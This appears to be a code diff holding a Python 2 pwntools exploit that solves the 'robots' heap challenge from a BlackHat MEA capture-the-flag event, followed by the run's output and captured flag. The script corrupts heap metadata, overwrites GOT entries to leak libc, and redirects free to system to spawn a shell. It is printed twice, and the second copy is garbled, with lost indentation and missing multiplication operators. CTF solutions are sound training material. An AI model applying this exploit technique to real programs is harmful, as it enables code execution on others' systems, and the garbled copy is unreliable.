soez · October 1, 2022 21:06
diff --git a/robots.py b/robots.py
 from pwn import *

 local = False
 binary = ELF("./main", checksec = False)
 libc = ELF("./libc-2.27.so", checksec = False)

 def menu(n):
 	io.recvuntil("> ")
 	io.sendline(str(n))

 def new_robot(sz):
 	menu(1)
 	io.recvuntil("Provide robot memory size:\n")
 	io.send(str(sz))
 	io.recvline()	

 def program_robot(slot, s):
 	menu(2)
 	io.recvuntil("Provide robot's slot:\n")
 	io.send(str(slot))
 	io.recvuntil("Program the robot:\n")
 	io.send(s)

 def destroy_robot(slot):
 	menu(3)
 	io.recvuntil("Provide robot's slot:\n")
 	io.send(str(slot))

 io = process(binary.path) if local else remote("blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa", 443, ssl=True, sni="blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa")
 bss = 0x4040f0
 new_robot(0x868)
 new_robot(0x868)
 destroy_robot(0)
 program_robot(0, p64(0) + p64(0x861) + p64(bss - 8) + p64(bss) + p64(0)*(0x840 // 8) + p16(0x860))
 destroy_robot(1)
 program_robot(0, p32(1)*6 + p64(0x404100))
 program_robot(0, p64(binary.got['free']) + p64(0x4040c8) + p64(binary.got['atoi']))
 program_robot(0, p64(binary.plt['puts']))
 destroy_robot(2)
 libc.address = u64(io.recv(6).ljust(8, '\0')) - 0x40670
 print "[+] Base libc: 0x%x" % libc.address
 system = libc.sym['system']
 bin_sh = libc.search("/bin/sh").next()
 print "[+] system: 0x%x" % system
 print "[+] bin_sh: 0x%x" % bin_sh
 program_robot(1, p32(0x800)*6 + p32(0x1)*8 + p64(binary.got['free']) + p64(0x404118))
 program_robot(0, p64(system))
 program_robot(1, p64(bin_sh))
 destroy_robot(3)
 io.sendline("/bin/cat flag.txt")
 print io.recv()
 io.close()
 '''
 noname@ubuntu:~/robot$ python2 robot.py 
 [+] Opening connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa on port 443: Done
 [+] Base libc: 0x7f3c859dd000
 [+] system: 0x7f3c85a2c420
 [+] bin_sh: 0x7f3c85b90d88
 BlackHatMEA{1421:23:1ff139d950b321dbb9bf6dc51327d7bd9ad1c4b2}
 [*] Closed connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa port 443
 '''
	from pwn import *

	local = False
	binary = ELF("./main", checksec = False)
	libc = ELF("./libc-2.27.so", checksec = False)

	def menu(n):
	io.recvuntil("> ")
	io.sendline(str(n))

	def new_robot(sz):
	menu(1)
	io.recvuntil("Provide robot memory size:\n")
	io.send(str(sz))
	io.recvline()

	def program_robot(slot, s):
	menu(2)
	io.recvuntil("Provide robot's slot:\n")
	io.send(str(slot))
	io.recvuntil("Program the robot:\n")
	io.send(s)

	def destroy_robot(slot):
	menu(3)
	io.recvuntil("Provide robot's slot:\n")
	io.send(str(slot))

	io = process(binary.path) if local else remote("blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa", 443, ssl=True, sni="blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa")
	bss = 0x4040f0
	new_robot(0x868)
	new_robot(0x868)
	destroy_robot(0)
	program_robot(0, p64(0) + p64(0x861) + p64(bss - 8) + p64(bss) + p64(0)*(0x840 // 8) + p16(0x860))
	destroy_robot(1)
	program_robot(0, p32(1)*6 + p64(0x404100))
	program_robot(0, p64(binary.got['free']) + p64(0x4040c8) + p64(binary.got['atoi']))
	program_robot(0, p64(binary.plt['puts']))
	destroy_robot(2)
	libc.address = u64(io.recv(6).ljust(8, '\0')) - 0x40670
	print "[+] Base libc: 0x%x" % libc.address
	system = libc.sym['system']
	bin_sh = libc.search("/bin/sh").next()
	print "[+] system: 0x%x" % system
	print "[+] bin_sh: 0x%x" % bin_sh
	program_robot(1, p32(0x800)6 + p32(0x1)8 + p64(binary.got['free']) + p64(0x404118))
	program_robot(0, p64(system))
	program_robot(1, p64(bin_sh))
	destroy_robot(3)
	io.sendline("/bin/cat flag.txt")
	print io.recv()
	io.close()
	'''
	noname@ubuntu:~/robot$ python2 robot.py
	[+] Opening connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa on port 443: Done
	[+] Base libc: 0x7f3c859dd000
	[+] system: 0x7f3c85a2c420
	[+] bin_sh: 0x7f3c85b90d88
	BlackHatMEA{1421:23:1ff139d950b321dbb9bf6dc51327d7bd9ad1c4b2}
	[*] Closed connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa port 443
	'''